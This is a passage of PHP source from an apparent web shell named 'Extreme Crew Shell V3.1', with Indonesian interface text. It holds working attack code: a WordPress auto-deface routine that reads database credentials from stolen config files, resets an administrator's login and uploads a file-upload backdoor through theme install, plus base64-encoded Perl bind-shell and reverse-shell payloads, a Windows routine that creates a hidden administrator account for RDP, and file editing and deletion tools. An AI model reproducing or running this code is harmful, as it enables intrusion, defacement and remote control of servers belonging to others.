  1656. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1657. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1658. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1659. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1660. $postResult = curl_exec($ch6);
  1661. curl_close($ch6);
  1662. $as = "$target/k.php";
  1663. $bs = anucurl($as);
  1664. if(preg_match("#$script#is", $bs)) {
  1665. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1666. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1667. } else {
  1668. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1669. echo "[!!] coba aja manual: <br>";
  1670. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1671. echo "[+] username: <font color=lime>$user</font><br>";
  1672. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1673. }
  1674. mysql_close($conn);
  1675. }
  1676. }
  1677. }
  1678. } else {
  1679. echo "<center><h1>WordPress Auto Deface</h1>
  1680. <form method='post'>
  1681. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1682. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
  1683. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1684. </form>
  1685. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1686. </center>";
  1687. }
  1688. } elseif($_GET['do'] == 'auto_dwp2') {
  1689. if($_POST['auto_deface_wp']) {
  1690. function anucurl($sites) {
  1691. $ch = curl_init($sites);
  1692. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1693. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1694. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1695. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1696. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1697. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1698. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1699. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1700. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1701. $data = curl_exec($ch);
  1702. curl_close($ch);
  1703. return $data;
  1704. }
  1705. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1706. $post = array(
  1707. "log" => "$userr",
  1708. "pwd" => "$pass",
  1709. "rememberme" => "forever",
  1710. "wp-submit" => "$wp_submit",
  1711. "redirect_to" => "$web",
  1712. "testcookie" => "1",
  1713. );
  1714. $ch = curl_init($cek);
  1715. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1716. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1717. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1718. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1719. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1720. curl_setopt($ch, CURLOPT_POST, 1);
  1721. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1722. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1723. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1724. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1725. $data = curl_exec($ch);
  1726. curl_close($ch);
  1727. return $data;
  1728. }
  1729. $link = explode("\r\n", $_POST['link']);
  1730. $script = htmlspecialchars($_POST['script']);
  1731. $user = "Extreme Crew";
  1732. $pass = "Extreme Crew";
  1733. $passx = md5($pass);
  1734. foreach($link as $dir_config) {
  1735. $config = anucurl($dir_config);
  1736. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1737. $dbuser = ambilkata($config,"DB_USER', '","'");
  1738. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1739. $dbname = ambilkata($config,"DB_NAME', '","'");
  1740. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1741. $prefix = $dbprefix."users";
  1742. $option = $dbprefix."options";
  1743. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1744. $db = mysql_select_db($dbname);
  1745. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1746. $result = mysql_fetch_array($q);
  1747. $id = $result[ID];
  1748. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1749. $result2 = mysql_fetch_array($q2);
  1750. $target = $result2[option_value];
  1751. if($target == '') {
  1752. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1753. } else {
  1754. echo "[+] $target <br>";
  1755. }
  1756. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1757. if(!$conn OR !$db OR !$update) {
  1758. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1759. mysql_close($conn);
  1760. } else {
  1761. $site = "$target/wp-login.php";
  1762. $site2 = "$target/wp-admin/theme-install.php?upload";
  1763. $b1 = anucurl($site2);
  1764. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1765. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1766. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1767. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1768. $www = "m.php";
  1769. $fp5 = fopen($www,"w");
  1770. fputs($fp5,$upload3);
  1771. $post2 = array(
  1772. "_wpnonce" => "$anu2",
  1773. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1774. "themezip" => "@$www",
  1775. "install-theme-submit" => "Install Now",
  1776. );
  1777. $ch = curl_init("$target/wp-admin/update.php?cr0tz&action=upload-theme");
  1778. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1779. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1780. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1781. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1782. curl_setopt($ch, CURLOPT_POST, 1);
  1783. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1784. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1785. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1786. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1787. $data3 = curl_exec($ch);
  1788. curl_close($ch);
  1789. $y = date("Y");
  1790. $m = date("m");
  1791. $namafile = "id.php";
  1792. $fpi = fopen($namafile,"w");
  1793. fputs($fpi,$script);
  1794. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1795. curl_setopt($ch6, CURLOPT_POST, true);
  1796. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1797. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1798. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1799. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1800. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1801. $postResult = curl_exec($ch6);
  1802. curl_close($ch6);
  1803. $as = "$target/k.php";
  1804. $bs = anucurl($as);
  1805. if(preg_match("#$script#is", $bs)) {
  1806. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1807. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1808. } else {
  1809. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1810. echo "[!!] coba aja manual: <br>";
  1811. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1812. echo "[+] username: <font color=lime>$user</font><br>";
  1813. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1814. }
  1815. mysql_close($conn);
  1816. }
  1817. }
  1818. } else {
  1819. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1820. <form method='post'>
  1821. Link Config: <br>
  1822. <textarea name='link' placeholder='http://target.com/3xp/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1823. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Extreme Crew' required><br>
  1824. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1825. </form></center>";
  1826. }
  1827. } elseif($_GET['do'] == 'network') {
  1828. echo "<form method='post'>
  1829. <u>Bind Port:</u> <br>
  1830. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1831. <input type='submit' name='sub_bp' value='>>'>
  1832. </form>
  1833. <form method='post'>
  1834. <u>Back Connect:</u> <br>
  1835. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1836. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1837. <input type='submit' name='sub_bc' value='>>'>
  1838. </form>";
  1839. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1840. if(isset($_POST['sub_bp'])) {
  1841. $f_bp = fopen("/tmp/bp.pl", "w");
  1842. fwrite($f_bp, base64_decode($bind_port_p));
  1843. fclose($f_bp);
  1844.  
  1845. $port = $_POST['port_bind'];
  1846. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1847. sleep(1);
  1848. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1849. unlink("/tmp/bp.pl");
  1850. }
  1851. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1852. if(isset($_POST['sub_bc'])) {
  1853. $f_bc = fopen("/tmp/bc.pl", "w");
  1854. fwrite($f_bc, base64_decode($bind_connect_p));
  1855. fclose($f_bc);
  1856.  
  1857. $ipbc = $_POST['ip_bc'];
  1858. $port = $_POST['port_bc'];
  1859. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1860. sleep(1);
  1861. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1862. unlink("/tmp/bc.pl");
  1863. }
  1864. } elseif($_GET['do'] == 'tentang'){
  1865. echo "<center>";
  1866. echo "<h2>Extreme Crew Shell V3.1</h2>";
  1867. echo "<p>Terima kasih buat kawan-kawan seperjuangan yang telah memberikan keperawa.. eh kepercayaan deng hehe</p>";
  1868. echo "<p>Terima kasih buat IndoXploit & K2LL33D yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya hehe";
  1869. echo "<p>Terima kasih untuk kawan homo,sering colay,sering nangis,sering baper,dan sering seiring waktu hahaha</p>";
  1870. echo "<p>Tanpa kalian saya tidak bisa menjadi seperti ini , terima kasih banyaklah pokoknya</p>";
  1871. echo "<p>Mr.BucketHead - Khan007 - Mr.ApaPedulimu - Versailles48 - Mr.DreamX196 - l0c4lh3artz - Mr.AchanX48 - ./Mr.J - Sohai - HaXor Tr0j4n - ./51N1CH1 - Ndivic404 - FrozenBear404 - KidSZonk - Jje Incovers - Courageux - /Zeelous - fcod3x - McQueen_404 - Sadream - Chinax1337 - Mr.Akashi - Mr.LittleHaxor - zp3nzas - dll</p>";
  1872. } elseif($_GET['do'] == 'krdp_shell') {
  1873. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1874. if($_POST['create']) {
  1875. $user = htmlspecialchars($_POST['user']);
  1876. $pass = htmlspecialchars($_POST['pass']);
  1877. if(preg_match("/$user/", exe("net user"))) {
  1878. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1879. } else {
  1880. $add_user = exe("net user $user $pass /add");
  1881. $add_groups1 = exe("net localgroup Administrators $user /add");
  1882. $add_groups2 = exe("net localgroup Administrator $user /add");
  1883. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1884. echo "[ RDP ACCOUNT INFO ]<br>
  1885. ------------------------------<br>
  1886. IP: <font color=lime>".$ip."</font><br>
  1887. Username: <font color=lime>$user</font><br>
  1888. Password: <font color=lime>$pass</font><br>
  1889. ------------------------------<br><br>
  1890. [ STATUS ]<br>
  1891. ------------------------------<br>
  1892. ";
  1893. if($add_user) {
  1894. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1895. } else {
  1896. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1897. }
  1898. if($add_groups1) {
  1899. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1900. } elseif($add_groups2) {
  1901. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1902. } elseif($add_groups3) {
  1903. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1904. } else {
  1905. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1906. }
  1907. echo "------------------------------<br>";
  1908. }
  1909. } elseif($_POST['s_opsi']) {
  1910. $user = htmlspecialchars($_POST['r_user']);
  1911. if($_POST['opsi'] == '1') {
  1912. $cek = exe("net user $user");
  1913. echo "Checking username <font color=lime>$user</font> ....... ";
  1914. if(preg_match("/$user/", $cek)) {
  1915. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1916. ------------------------------<br><br>
  1917. <pre>$cek</pre>";
  1918. } else {
  1919. echo "[ <font color=red>belum ada</font> ]";
  1920. }
  1921. } elseif($_POST['opsi'] == '2') {
  1922. $cek = exe("net user $user Extreme Crew");
  1923. if(preg_match("/$user/", exe("net user"))) {
  1924. echo "[change password: <font color=lime>Extreme Crew</font>] -> ";
  1925. if($cek) {
  1926. echo "<font color=lime>Berhasil</font>";
  1927. } else {
  1928. echo "<font color=red>Gagal</font>";
  1929. }
  1930. } else {
  1931. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1932. }
  1933. } elseif($_POST['opsi'] == '3') {
  1934. $cek = exe("net user $user /DELETE");
  1935. if(preg_match("/$user/", exe("net user"))) {
  1936. echo "[remove user: <font color=lime>$user</font>] -> ";
  1937. if($cek) {
  1938. echo "<font color=lime>Berhasil</font>";
  1939. } else {
  1940. echo "<font color=red>Gagal</font>";
  1941. }
  1942. } else {
  1943. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1944. }
  1945. } else {
  1946. //
  1947. }
  1948. } else {
  1949. echo "-- Create RDP --<br>
  1950. <form method='post'>
  1951. <input type='text' name='user' placeholder='username' value='Extreme Crew' required>
  1952. <input type='text' name='pass' placeholder='password' value='Extreme Crew' required>
  1953. <input type='submit' name='create' value='>>'>
  1954. </form>
  1955. -- Option --<br>
  1956. <form method='post'>
  1957. <input type='text' name='r_user' placeholder='username' required>
  1958. <select name='opsi'>
  1959. <option value='1'>Cek Username</option>
  1960. <option value='2'>Ubah Password</option>
  1961. <option value='3'>Hapus Username</option>
  1962. </select>
  1963. <input type='submit' name='s_opsi' value='>>'>
  1964. </form>
  1965. ";
  1966. }
  1967. } else {
  1968. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1969. }
  1970. } elseif($_GET['act'] == 'newfile') {
  1971. if($_POST['new_save_file']) {
  1972. $newfile = htmlspecialchars($_POST['newfile']);
  1973. $fopen = fopen($newfile, "a+");
  1974. if($fopen) {
  1975. $act = "<script>window.location='?cr0tz&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
  1976. } else {
  1977. $act = "<font color=red>permission denied</font>";
  1978. }
  1979. }
  1980. echo $act;
  1981. echo "<form method='post'>
  1982. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1983. <input type='submit' name='new_save_file' value='Submit'>
  1984. </form>";
  1985. } elseif($_GET['act'] == 'newfolder') {
  1986. if($_POST['new_save_folder']) {
  1987. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1988. if(!mkdir($new_folder)) {
  1989. $act = "<font color=red>permission denied</font>";
  1990. } else {
  1991. $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
  1992. }
  1993. }
  1994. echo $act;
  1995. echo "<form method='post'>
  1996. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1997. <input type='submit' name='new_save_folder' value='Submit'>
  1998. </form>";
  1999. } elseif($_GET['act'] == 'rename_dir') {
  2000. if($_POST['dir_rename']) {
  2001. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2002. if($dir_rename) {
  2003. $act = "<script>window.location='?cr0tz&folder=".dirname($dir)."';</script>";
  2004. } else {
  2005. $act = "<font color=red>permission denied</font>";
  2006. }
  2007. echo "".$act."<br>";
  2008. }
  2009. echo "<form method='post'>
  2010. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2011. <input type='submit' name='dir_rename' value='rename'>
  2012. </form>";
  2013. } elseif($_GET['act'] == 'delete_dir') {
  2014. if(is_dir($dir)) {
  2015. if(is_writable($dir)) {
  2016. @rmdir($dir);
  2017. @exe("rm -rf $dir");
  2018. @exe("rmdir /s /q $dir");
  2019. $act = "<script>window.location='?cr0tz&folder=".dirname($dir)."';</script>";
  2020. } else {
  2021. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2022. }
  2023. }
  2024. echo $act;
  2025. } elseif($_GET['act'] == 'view') {
  2026. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2027. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2028. } elseif($_GET['act'] == 'edit') {
  2029. if($_POST['save']) {
  2030. $save = file_put_contents($_GET['file'], $_POST['src']);
  2031. if($save) {
  2032. $act = "<font color=lime>Saved!</font>";
  2033. } else {
  2034. $act = "<font color=red>permission denied</font>";
  2035. }
  2036. echo "".$act."<br>";
  2037. }
  2038. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2039. echo "<form method='post'>
  2040. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2041. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2042. </form>";
  2043. } elseif($_GET['act'] == 'rename') {
  2044. if($_POST['do_rename']) {
  2045. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2046. if($rename) {
  2047. $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
  2048. } else {
  2049. $act = "<font color=red>permission denied</font>";
  2050. }
  2051. echo "".$act."<br>";
  2052. }
  2053. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?cr0tz&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?cr0tz&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?cr0tz&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?cr0tz&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?cr0tz&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2054. echo "<form method='post'>
  2055. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2056. <input type='submit' name='do_rename' value='rename'>
  2057. </form>";
  2058. } elseif($_GET['act'] == 'delete') {
  2059. $delete = unlink($_GET['file']);
  2060. if($delete) {
  2061. $act = "<script>window.location='?cr0tz&folder=".$dir."';</script>";
  2062. } else {
  2063. $act = "<font color=red>permission denied</font>";
  2064. }
  2065. echo $act;
  2066. } else {
  2067. if(is_dir($dir) === true) {
  2068. if(!is_readable($dir)) {
  2069. echo "<font color=red>can't open directory. ( not readable )</font>";
  2070. } else {
  2071. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2072. <tr>
  2073. <th class="th_home"><center>Name</center></th>
  2074. <th class="th_home"><center>Type</center></th>
  2075. <th class="th_home"><center>Size</center></th>
  2076. <th class="th_home"><center>Last Modified</center></th>
  2077. <th class="th_home"><center>Owner/Group</center></th>
  2078. <th class="th_home"><center>Permission</center></th>
  2079. <th class="th_home"><center>Action</center></th>
  2080. </tr>';
  2081. $scandir = scandir($dir);
  2082. foreach($scandir as $dirx) {
  2083. $dtype = filetype("$dir/$dirx");
  2084. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2085. if(function_exists('posix_getpwuid')) {
  2086. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2087. $downer = $downer['name'];
  2088. } else {
  2089. //$downer = $uid;
  2090. $downer = fileowner("$dir/$dirx");
  2091. }
  2092. if(function_exists('posix_getgrgid')) {
  2093. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2094. $dgrp = $dgrp['name'];
  2095. } else {
  2096. $dgrp = filegroup("$dir/$dirx");
  2097. }
  2098. if(!is_dir("$dir/$dirx")) continue;
  2099. if($dirx === '..') {
  2100. $href = "<a href='?cr0tz&folder=".dirname($dir)."'>$dirx</a>";
  2101. } elseif($dirx === '.') {
  2102. $href = "<a href='?cr0tz&folder=$dir'>$dirx</a>";
  2103. } else {
  2104. $href = "<a href='?cr0tz&folder=$dir/$dirx'>$dirx</a>";
  2105. }
  2106. if($dirx === '.' || $dirx === '..') {
  2107. $act_dir = "<a href='?cr0tz&act=newfile&folder=$dir'>newfile</a> | <a href='?cr0tz&act=newfolder&folder=$dir'>newfolder</a>";
  2108. } else {
  2109. $act_dir = "<a href='?cr0tz&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?cr0tz&act=delete_dir&folder=$dir/$dirx'>delete</a>";
  2110. }
  2111. echo "<tr>";
  2112. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2113. echo "<td class='td_home'><center>$dtype</center></td>";
  2114. echo "<td class='td_home'><center>-</center></th></td>";
  2115. echo "<td class='td_home'><center>$dtime</center></td>";
  2116. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2117. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2118. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2119. echo "</tr>";
  2120. }
  2121. }
  2122. } else {
  2123. echo "<font color=red>can't open directory.</font>";
  2124. }
  2125. foreach($scandir as $file) {
  2126. $ftype = filetype("$dir/$file");
  2127. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2128. $size = filesize("$dir/$file")/1024;
  2129. $size = round($size,3);
  2130. if(function_exists('posix_getpwuid')) {
  2131. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2132. $fowner = $fowner['name'];
  2133. } else {
  2134. //$downer = $uid;
  2135. $fowner = fileowner("$dir/$file");
  2136. }
  2137. if(function_exists('posix_getgrgid')) {
  2138. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2139. $fgrp = $fgrp['name'];
  2140. } else {
  2141. $fgrp = filegroup("$dir/$file");
  2142. }
  2143. if($size > 1024) {
  2144. $size = round($size/1024,2). 'MB';
  2145. } else {
  2146. $size = $size. 'KB';
  2147. }
  2148. if(!is_file("$dir/$file")) continue;
  2149. echo "<tr>";
  2150. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?cr0tz&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
  2151. echo "<td class='td_home'><center>$ftype</center></td>";
  2152. echo "<td class='td_home'><center>$size</center></td>";
  2153. echo "<td class='td_home'><center>$ftime</center></td>";
  2154. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
